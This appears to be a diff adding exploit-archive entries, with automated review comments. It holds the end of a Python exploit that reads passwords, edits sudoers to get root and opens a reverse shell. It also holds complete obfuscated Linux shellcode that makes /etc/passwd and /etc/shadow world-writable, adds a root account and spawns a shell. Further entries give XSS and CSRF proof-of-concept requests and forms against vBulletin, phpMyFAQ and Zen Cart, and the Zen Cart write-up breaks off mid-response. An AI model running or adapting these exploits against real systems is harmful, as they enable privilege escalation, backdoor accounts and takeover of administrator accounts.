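+exploit.read_passwords()
+print '[-] whoami (should be apache):'
+exploit.exec_cmd('id', output=True)
+print '[+] On the way to the uid 0...'
+exploit.edit_sudoers()
+print '[-] Got root?'
+exploit.exec_cmd('id', output=True)
+if cmd == 'reverseshell':
+print '[+] You should now have a shell on %s:%s' % (rip, rport)
+exploit.reverse_shell(rip, rport)
+else:
+print '[+] Your command Sir:'
+exploit.exec_cmd(cmd, output=True)
+sys.exit(1)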
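Review bot: The exit codes are inverted: `usage()` at L617 and the missing-argument branch at L625 call `sys.exit(0)` on error, while the successful path ends with `sys.exit(1)` at L643, so any caller checking the status sees failure on success and vice versa; the three calls should be `sys.exit(1)`, `sys.exit(1)` and `sys.exit(0)` respectively. The file is Python 2 only (`print` statements, `httplib`, `.encode('hex')`, `.encode('base64')`) but neither the shebang at L448 nor the header comment says so; a one-line `# Requires Python 2` in the header would save readers a SyntaxError under a Python 3 `python`. The rendered listing has also lost all indentation, so L553–L643 cannot be read as valid Python as printed.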

platforms/linux/shellcode/34592.c Executable file

@ -0,0 +1,209 @@
/*
#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
#length: 521 bytes
#Date: 8 September 2018
#Author: Ali Razmjoo
#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Thanks to Jonathan Salwan
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 31 c9 xor %ecx,%ecx
6: 31 d2 xor %edx,%edx
8: bb 59 45 4f 53 mov $0x534f4559,%ebx
d: ba 33 36 38 37 mov $0x37383633,%edx
12: 31 d3 xor %edx,%ebx
14: 53 push %ebx
15: c1 eb 08 shr $0x8,%ebx
18: 53 push %ebx
19: bb 7a 46 59 45 mov $0x4559467a,%ebx
1e: ba 55 36 38 36 mov $0x36383655,%edx
23: 31 d3 xor %edx,%ebx
25: 53 push %ebx
26: bb 67 58 45 4e mov $0x4e455867,%ebx
2b: ba 48 3d 31 2d mov $0x2d313d48,%edx
30: 31 d3 xor %edx,%ebx
32: 53 push %ebx
33: 89 e3 mov %esp,%ebx
35: 68 41 41 ff 01 push $0x1ff4141
3a: 59 pop %ecx
3b: c1 e9 08 shr $0x8,%ecx
3e: c1 e9 08 shr $0x8,%ecx
41: 6a 0f push $0xf
43: 58 pop %eax
44: cd 80 int $0x80
46: bb 53 49 57 4a mov $0x4a574953,%ebx
4b: ba 39 2d 38 3d mov $0x3d382d39,%edx
50: 31 d3 xor %edx,%ebx
52: c1 eb 08 shr $0x8,%ebx
55: 53 push %ebx
56: bb 6d 47 45 58 mov $0x5845476d,%ebx
5b: ba 42 34 2d 39 mov $0x392d3442,%edx
60: 31 d3 xor %edx,%ebx
62: 53 push %ebx
63: bb 6e 54 49 57 mov $0x5749546e,%ebx
68: ba 41 31 3d 34 mov $0x343d3141,%edx
6d: 31 d3 xor %edx,%ebx
6f: 53 push %ebx
70: 89 e3 mov %esp,%ebx
72: 68 41 41 ff 01 push $0x1ff4141
77: 59 pop %ecx
78: c1 e9 08 shr $0x8,%ecx
7b: c1 e9 08 shr $0x8,%ecx
7e: 6a 0f push $0xf
80: 58 pop %eax
81: cd 80 int $0x80
83: bb 73 47 4e 51 mov $0x514e4773,%ebx
88: ba 32 34 39 35 mov $0x35393432,%edx
8d: 31 d3 xor %edx,%ebx
8f: c1 eb 08 shr $0x8,%ebx
92: 53 push %ebx
93: bb 59 44 56 44 mov $0x44564459,%ebx
98: ba 76 34 37 37 mov $0x37373476,%edx
9d: 31 d3 xor %edx,%ebx
9f: 53 push %ebx
a0: bb 4e 58 59 51 mov $0x5159584e,%ebx
a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx
aa: 31 d3 xor %edx,%ebx
ac: 53 push %ebx
ad: 89 e3 mov %esp,%ebx
af: 68 41 41 01 04 push $0x4014141
b4: 59 pop %ecx
b5: c1 e9 08 shr $0x8,%ecx
b8: c1 e9 08 shr $0x8,%ecx
bb: 6a 05 push $0x5
bd: 58 pop %eax
be: cd 80 int $0x80
c0: 89 c3 mov %eax,%ebx
c2: 6a 04 push $0x4
c4: 58 pop %eax
c5: 68 41 73 68 0a push $0xa687341
ca: 59 pop %ecx
cb: c1 e9 08 shr $0x8,%ecx
ce: 51 push %ecx
cf: b9 57 67 57 58 mov $0x58576757,%ecx
d4: ba 39 48 35 39 mov $0x39354839,%edx
d9: 31 d1 xor %edx,%ecx
db: 51 push %ecx
dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx
e1: ba 74 4b 38 38 mov $0x38384b74,%edx
e6: 31 d1 xor %edx,%ecx
e8: 51 push %ecx
e9: b9 47 57 56 42 mov $0x42565747,%ecx
ee: ba 35 38 39 36 mov $0x36393835,%edx
f3: 31 d1 xor %edx,%ecx
f5: 51 push %ecx
f6: b9 61 70 51 4e mov $0x4e517061,%ecx
fb: ba 2d 39 6b 61 mov $0x616b392d,%edx
100: 31 d1 xor %edx,%ecx
102: 51 push %ecx
103: b9 48 58 70 74 mov $0x74705848,%ecx
108: ba 72 68 4a 35 mov $0x354a6872,%edx
10d: 31 d1 xor %edx,%ecx
10f: 51 push %ecx
110: b9 76 45 56 46 mov $0x46564576,%ecx
115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx
11a: 31 d1 xor %edx,%ecx
11c: 51 push %ecx
11d: 68 66 77 55 57 push $0x57557766
122: 68 68 70 31 50 push $0x50317068
127: 68 7a 59 65 41 push $0x4165597a
12c: 68 41 61 41 51 push $0x51416141
131: 68 49 38 75 74 push $0x74753849
136: 68 50 4d 59 68 push $0x68594d50
13b: 68 54 42 74 7a push $0x7a744254
140: 68 51 2f 38 54 push $0x54382f51
145: 68 45 36 6d 67 push $0x676d3645
14a: 68 76 50 2e 73 push $0x732e5076
14f: 68 4e 58 52 37 push $0x3752584e
154: 68 39 4b 55 48 push $0x48554b39
159: 68 72 2f 59 42 push $0x42592f72
15e: 68 56 78 4b 47 push $0x474b7856
163: 68 39 55 66 5a push $0x5a665539
168: 68 46 56 6a 68 push $0x686a5646
16d: 68 46 63 38 79 push $0x79386346
172: 68 70 59 6a 71 push $0x716a5970
177: 68 77 69 53 68 push $0x68536977
17c: 68 6e 54 67 54 push $0x5467546e
181: 68 58 4d 69 37 push $0x37694d58
186: 68 2f 41 6e 24 push $0x246e412f
18b: 68 70 55 6e 4d push $0x4d6e5570
190: 68 24 36 24 6a push $0x6a243624
195: b9 73 61 74 67 mov $0x67746173,%ecx
19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx
19f: 31 d1 xor %edx,%ecx
1a1: 51 push %ecx
1a2: 89 e1 mov %esp,%ecx
1a4: ba 41 41 41 7f mov $0x7f414141,%edx
1a9: c1 ea 08 shr $0x8,%edx
1ac: c1 ea 08 shr $0x8,%edx
1af: c1 ea 08 shr $0x8,%edx
1b2: cd 80 int $0x80
1b4: 31 c0 xor %eax,%eax
1b6: b0 46 mov $0x46,%al
1b8: 31 db xor %ebx,%ebx
1ba: 31 c9 xor %ecx,%ecx
1bc: cd 80 int $0x80
1be: 31 c0 xor %eax,%eax
1c0: b0 46 mov $0x46,%al
1c2: 31 db xor %ebx,%ebx
1c4: 31 c9 xor %ecx,%ecx
1c6: cd 80 int $0x80
1c8: 68 52 55 48 42 push $0x42485552
1cd: 68 52 51 49 43 push $0x43495152
1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx
1d7: ba 66 38 31 35 mov $0x35313866,%edx
1dc: 31 d1 xor %edx,%ecx
1de: 51 push %ecx
1df: b9 55 55 54 57 mov $0x57545555,%ecx
1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx
1e9: 31 d1 xor %edx,%ecx
1eb: 51 push %ecx
1ec: 89 e3 mov %esp,%ebx
1ee: 31 c0 xor %eax,%eax
1f0: 88 43 07 mov %al,0x7(%ebx)
1f3: 89 5b 08 mov %ebx,0x8(%ebx)
1f6: 89 43 0c mov %eax,0xc(%ebx)
1f9: b0 0b mov $0xb,%al
1fb: 8d 4b 08 lea 0x8(%ebx),%ecx
1fe: 8d 53 0c lea 0xc(%ebx),%edx
201: cd 80 int $0x80
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@g3n3rall:~/Desktop/xpl#
*/
#include <stdio.h>
#include <string.h>
char sc[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x8
8\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80";
int main(void)
{
fprintf(stdout,"Length: %d\n\n",strlen(sc));
(*(void(*)()) sc)();
}

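--- a/platforms/php/webapps/34579.txt
+++ b/platforms/php/webapps/34579.txt
@@ -0,0 +1,118 @@
+#Title: vBulletin 5.1.X - Cross Site Scripting
+#Date: 05.09.14
+#Version: => 5.1.2 (Latest ATM)
+#Vendor: vbulletin.com
+#Contact: smash [at] devilteam.pl
+1) Agenda
+Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
+Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
+2) Vulnerability
+First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
+Let's take as example following address:
+http://vbulletin/member/2-victim
+1. Click 'Share photo' (camera icon), pick any image you like.
+2. You may add comment about photo, all you need to do is to add js payload.
+As comment, use something like - huh" onmouseover=alert(666) xss="
+Request:
+POST /ajax/render/editor_gallery_photoblock HTTP/1.1
+Host: vbulletin
+photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
+3. Send image by clicking on 'Post' button.
+Request:
+POST /create-content/gallery HTTP/1.1
+Host: vbulletin
+Content-Type: multipart/form-data;
+boundary=---------------------------18897880557155952661558219659
+Content-Length: 1558
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="text"
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="filedataid[]"
+13
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="title_13"
+cool" onmouseover=alert(666) xssed="
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+[TOKEN]
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="parentid"
+8
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="setfor"
+5
+-----------------------------18897880557155952661558219659--
+4. Done
+At this point, victim should be noticed about new activity via 'Messages' tab:
+"attacker has left you a visitor message"
+Basically, you may use this XSS against any profile.
+Now, whenever someone will visit profile of victim (ie. http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
+When victim will click on image, js will be executed, and popup will appear.
+Request:
+GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
+Host: vbulletin
+Response:
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=UTF-8
+{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By <a href=\"vbulletin\/member\/2-victim\">victim.victim@tlen.pl<\/a> in <a href=\"javascript:$('#slideshow-dialog').dialog('close');void(0);\">No Title<\/a><br \/>\n"}]}
+3) TL;DR
+- Visit victim profile
+- Upload any image
+- XSS in title (asdf" onmouseover=alert(666) xss=")
+- Send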
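Review bot: The line `Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.` recommends input filtering, but the JSON response later in the file shows the stored title correctly escaped inside the JSON (`\"`), so the injection presumably happens where the client-side gallery code writes that title into an HTML attribute; the remediation to state is attribute-context output encoding at that render point (and server-side encoding wherever the title is echoed into HTML), since input filtering alone breaks legitimate titles and does not cover every output context. The TL;DR payload `asdf" onmouseover=alert(666) xss="` differs from the `huh"`/`cool"` values used in the walkthrough; one consistent example would make the write-up easier to follow. The header `#Version: => 5.1.2 (Latest ATM)` reads as "greater than or equal", while the text treats the latest release as the upper bound, so `<= 5.1.2` is presumably intended.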

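--- a/platforms/php/webapps/34580.txt
+++ b/platforms/php/webapps/34580.txt
@@ -0,0 +1,207 @@
+#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
+#Vendor: phpmyfaq.de
+#Date: 04.09.19
+#Version: >= 2.8.12 (Latest ATM)
+#Tested on: Apache 2.2 / PHP 5.4 / Linux
+#Contact: smash [at] devilteam.pl
+1) Persistent XSS
+Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
+For example, to view informations about session with ID 1, you need visit following address:
+http://localhost/phpmyfaq/admin/?action=viewsession&id=1
+Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
+PoC:
+<?php
+$ch =curl_init("http://localhost/phpmyfaq/index.php");
+curl_setopt($ch,CURLOPT_USERAGENT,'<script>alert(666)</script>');
+curl_setopt($ch, CURLOPT_REFERER, '<script>alert(123)</script>');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>
+Vuln (viewsession):
+<tbody>
+<tr>
+<td>2014-09-04 02:22:04</td>
+<td>new_session (0)</td>
+</tr>
+<tr>
+<td>Referer:</td>
+<td>
+<a href="<script>alert(123)</script>" target="_blank">
+<script>alert(123)</script> </a>
+</td>
+</tr>
+<tr>
+<td>Browser:</td>
+<td><script>alert(666)</script></td>
+</tr>
+<tr>
+<td>IP-Address:</td>
+<td>::1</td>
+</tr>
+</tbody>
+2) Remote FAQ Disclosure
+Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
+- Download
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
+<input type="hidden" name="catid" value="0" />
+<input type="hidden" name="downwards" value="1" />
+<input type="hidden" name="type" value="xml" />
+<input type="hidden" name="dispos" value="attachment" />
+<input type="hidden" name="submitExport" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+- View
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=exportfile" method="POST">
+<input type="hidden" name="catid" value="0" />
+<input type="hidden" name="downwards" value="1" />
+<input type="hidden" name="type" value="xml" />
+<input type="hidden" name="dispos" value="inline" />
+<input type="hidden" name="submitExport" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+3) CSRF
+- Edit user credentials (login/mail)
+PoC:
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=user&user_action=update_data" method="POST">
+<input type="hidden" name="user_id" value="1" />
+<input type="hidden" name="user_status" value="active" />
+<input type="hidden" name="display_name" value="haked" />
+<input type="hidden" name="email" value="victim@vic.tim" />
+<input type="hidden" name="last_modified" value="undefined" />
+<input type="submit" value="Go" />
+</form>
+</body>
+</html>
+By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
+- Delete user
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
+- Delete category
+http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
+- Delete session (month)
+PoC:
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=viewsessions" method="POST">
+<input type="hidden" name="month" value="092014" />
+<input type="hidden" name="statdelete" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+- Delete logs older than 30 days
+http://localhost/phpmyfaq/admin/?action=deleteadminlog
+- Add stopword
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
+- Edit configuration
+Affected:
+Main configuration
+FAQ records configuration
+Search
+Security configuration
+Spam control center
+Social network configuration
+PoC:
+<html>
+<body>
+<form action="http://localhost/phpmyfaq/admin/?action=config&config_action=saveConfig" method="POST">
+<input type="hidden" name="edit[main.language]" value="language_en.php" />
+<input type="hidden" name="edit[main.languageDetection]" value="true" />
+<input type="hidden" name="edit[main.titleFAQ]" value="phpMyFAQ Codename Perdita" />
+<input type="hidden" name="edit[main.currentVersion]" value="2.8.12" />
+<input type="hidden" name="edit[main.metaDescription]" value="lolwat" />
+<input type="hidden" name="edit[main.metaKeywords]" value="" />
+<input type="hidden" name="edit[main.metaPublisher]" value="Whatever" />
+<input type="hidden" name="edit[main.administrationMail]" value="what@ever.com" />
+<input type="hidden" name="edit[main.contactInformations]" value="" />
+<input type="hidden" name="edit[main.send2friendText]" value="" />
+<input type="hidden" name="edit[main.enableUserTracking]" value="true" />
+<input type="hidden" name="edit[main.enableAdminLog]" value="true" />
+<input type="hidden" name="edit[main.referenceURL]" value="http://localhost/phpmyfaq" />
+<input type="hidden" name="edit[main.urlValidateInterval]" value="86400" />
+<input type="hidden" name="edit[main.enableWysiwygEditor]" value="true" />
+<input type="hidden" name="edit[main.templateSet]" value="default" />
+<input type="hidden" name="edit[main.dateFormat]" value="Y-m-d H:i" />
+<input type="hidden" name="edit[records.maxAttachmentSize]" value="100000" />
+<input type="hidden" name="edit[records.disableAttachments]" value="true" />
+<input type="hidden" name="edit[records.numberOfRecordsPerPage]" value="10" />
+<input type="hidden" name="edit[records.numberOfShownNewsEntries]" value="3" />
+<input type="hidden" name="edit[records.numberOfRelatedArticles]" value="5" />
+<input type="hidden" name="edit[records.orderby]" value="id" />
+<input type="hidden" name="edit[records.sortby]" value="DESC" />
+<input type="hidden" name="edit[records.attachmentsPath]" value="attachments" />
+<input type="hidden" name="edit[records.defaultAttachmentEncKey]" value="" />
+<input type="hidden" name="edit[records.orderingPopularFaqs]" value="visits" />
+<input type="hidden" name="edit[records.autosaveSecs]" value="180" />
+<input type="hidden" name="edit[search.numberSearchTerms]" value="10" />
+<input type="hidden" name="edit[search.relevance]" value="thema,content,keywords" />
+<input type="hidden" name="edit[security.bannedIPs]" value="" />
+<input type="hidden" name="edit[security.permLevel]" value="basic" />
+<input type="hidden" name="edit[security.ssoLogoutRedirect]" value="" />
+<input type="hidden" name="edit[spam.enableSafeEmail]" value="true" />
+<input type="hidden" name="edit[spam.checkBannedWords]" value="true" />
+<input type="hidden" name="edit[spam.enableCaptchaCode]" value="true" />
+<input type="hidden" name="edit[socialnetworks.twitterConsumerKey]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterConsumerSecret]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterAccessTokenKey]" value="" />
+<input type="hidden" name="edit[socialnetworks.twitterAccessTokenSecret]" value="" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>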
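Review bot: The header `#Date: 04.09.19` is inconsistent with the session timestamp `2014-09-04 02:22:04` shown in the viewsession excerpt and with the sibling advisories in this commit; it should presumably read `#Date: 04.09.14`. Likewise `#Version: >= 2.8.12 (Latest ATM)` reads as "greater than or equal" while the text treats 2.8.12 as the latest affected release, so `<= 2.8.12` is presumably meant. In section 2, the claim that the export works "even without having an account" is not demonstrated by the PoC, which is a browser-submitted form that would equally succeed as CSRF against a logged-in administrator; stating whether the request was confirmed from an unauthenticated session would make the severity claim verifiable. The persistent XSS in section 1 is also worth framing for defenders as a sanitisation gap in the admin session viewer (untrusted Referer and User-Agent headers rendered without HTML encoding), since that is where the fix belongs rather than in the request-producing PoC.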

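--- a/platforms/php/webapps/34581.txt
+++ b/platforms/php/webapps/34581.txt
@@ -0,0 +1,712 @@
+#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
+#Date: 09.07.14
+#Vendor: zen-cart.com
+#Tested on: Apache 2.2 [at] Linux
+#Contact: smash[at]devilteam.pl
+#1 - CSRF
+- Delete admin
+GET profile stands for user id.
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
+- Reset layout boxes to default
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
+#2 - Persistent XSS in admin panel
+Since admin privileges are required to execute following vulnerablities this is not a serious threat.
+- Extras -> Media types -> Add
+Vulnerable parameters - type_name & type_exit
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
+Content-Length: 663
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="securityToken"
+b98019227f8014aed6d22b02f0748d11
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="type_name"
+<h1>sup<!--
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="type_ext"
+sup<>
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="x"
+19
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="y"
+13
+-----------------------------4978676881674017321390852339--
+Response:
+(...)
+<td class="dataTableContent"><h1>sup<!--</td>
+<td class="dataTableContent">sup<></td>
+<td class="dataTableContent" align="right">
+(...)
+- Extras -> Media manager -> Add
+Vulnerable parameter - media_name
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/media_manager.php?page=1&mID=1&action=save HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------1835318161847256146721022401
+Content-Length: 5633
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="securityToken"
+b98019227f8014aed6d22b02f0748d11
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="media_name"
+<script>alert(666)</script>
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="x"
+32
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="y"
+16
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="clip_filename"; filename="cat.png"
+Content-Type: image/png
+(image)
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="media_dir"
+-----------------------------1835318161847256146721022401
+Content-Disposition: form-data; name="media_type"
+2
+-----------------------------1835318161847256146721022401--
+Response:
+(...)
+<td class="dataTableContent"><script>alert(666)</script></td>
+<td class="dataTableContent" align="right">
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><strong><script>alert(666)</script></strong></td>
+</tr>
+- Extras -> Music genre -> Add
+Vulenrable parameter - music_genre_name
+POST /zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?action=insert HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------202746648818048680751007920584
+Content-Length: 581
+-----------------------------202746648818048680751007920584
+Content-Disposition: form-data; name="securityToken"
+b98019227f8014aed6d22b02f0748d11
+-----------------------------202746648818048680751007920584
+Content-Disposition: form-data; name="music_genre_name"
+<script>alert(666)</script>
+-----------------------------202746648818048680751007920584
+Content-Disposition: form-data; name="x"
+37
+-----------------------------202746648818048680751007920584
+Content-Disposition: form-data; name="y"
+10
+-----------------------------202746648818048680751007920584--
+Response:
+(...)
+<tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost/zen/zen-cart-v1.5.3-07042014/admin123/music_genre.php?page=1&mID=1&action=edit'">
+<td class="dataTableContent"><script>alert(666)</script></td>
+<td class="dataTableContent" align="right">
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
+</tr>
+(...)
+Further vuln:
+http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
+Response:
+(...)
+<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
+<script>alert(666)</script>
+</div>
+(...)
+- Extras -> Record companies -> Add
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/record_company.php?action=insert HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------19884630671863875697751588711
+Content-Length: 5828
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="securityToken"
+b98019227f8014aed6d22b02f0748d11
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="record_company_name"
+<script>alert(666)</script>
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="record_company_image"; filename="<img src=# onerror=alert(1)>.png"
+Content-Type: image/png
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="img_dir"
+categories/
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="record_company_image_manual"
+/etc/passwd
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="record_company_url[1]"
+'>"><>XSS
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="x"
+21
+-----------------------------19884630671863875697751588711
+Content-Disposition: form-data; name="y"
+13
+-----------------------------19884630671863875697751588711--
+Response:
+(...)
+<td class="dataTableContent"><script>alert(666)</script></td>
+<td class="dataTableContent" align="right">
+(...)
+<tr class="infoBoxHeading">
+<td class="infoBoxHeading"><b><script>alert(666)</script></b></td>
+</tr>
+(...)
+Further vuln:
+http://localhost/zen/zen-cart-v1.5.3-07042014/index.php?main_page=index&typefilter=music_genre&music_genre_id=1
+Response:
+(...)
+<div id="navBreadCrumb"> <a href="http://localhost/zen/zen-cart-v1.5.3-07042014/">Home</a>&nbps;::&nbps;
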